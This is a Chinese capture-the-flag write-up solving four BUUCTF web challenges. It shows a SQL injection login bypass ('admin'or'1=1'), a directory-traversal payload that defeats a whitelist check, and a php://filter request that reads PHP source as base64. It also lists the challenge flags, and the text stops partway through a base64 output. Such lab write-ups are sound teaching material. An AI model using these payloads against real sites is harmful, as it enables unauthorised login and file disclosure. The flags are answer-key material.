一、[极客大挑战 2019]EasySQL
启动靶机,出现这个用户登录页面
随便输入一个用户名和密码,通过网址可以判断出该请求方式
使用万能密码测试是否存在SQL注入漏洞
username=admin'or'1=1&password=admin'or'1=1
登录后便可查看到flag
flag为:
flag{5d3cac62-7357-493e-bc2a-6d9030c2a22b}
二、 [极客大挑战 2019]Havefun
启动靶机,出现以下页面
查看源代码
尝试在网址后面加上?cat=dog
http://2414a278-f293-41f0-9adc-2490774e8790.node4.buuoj.cn:81/?cat=dog
出现以下存在flag的页面
flag为:
flag{4de413d7-e7df-4ef8-a068-d384f81ae6b4}
三、[HCTF 2018]WarmUp
启动靶机,出现以下页面
查看源代码
source.php 应该是后端的源码,这题代码审计了
源码中 给出了 两个文件,还有一个 hint.php,这里给出了flag的位置
# ! empty($_REQUEST['file']) 第一次判断,file参数是不是空的,非空为True
# is_string($_REQUEST['file']) 第二次判断,file参数是不是字符串,是字符串True
# emmm::checkFile($_REQUEST['file']) ) 第三次,检查 file 的值(file中包含 $whilelist 存在的值)
# 由于 不知道 ffffllllaaaagggg 的位置,所以可以用 ../../../../../../ 目录穿越的方式进行访问(目录穿越建议6-10个../)
# payloadfile=source.php?../../../../../ffffllllaaaagggg
file=hint.php?../../../../../ffffllllaaaagggg
得到flag
flag为:
flag{639456e1-1aef-4df2-b922-879cce4c3ec0}
四、[ACTF2020 新生赛]Include
启动靶机,出现以下界面
点击tips跳转到flag.php,flag应该就在这个php文件中
文件名为flag.php,那么flag应该就存在于此文件中,但是我们f12并没有查看到flag
猜测flag应该是在flag.php的源代码当中,我们可以利用php://filter伪协议来查看flag.php的源代码,构造payload:
?file=php://filter/convert.base64-encode/resource=flag.php
成功获取到flag.php加密后到源代码内容:
PD9waHAKZWNobyAiQ2FuIHlvdSBm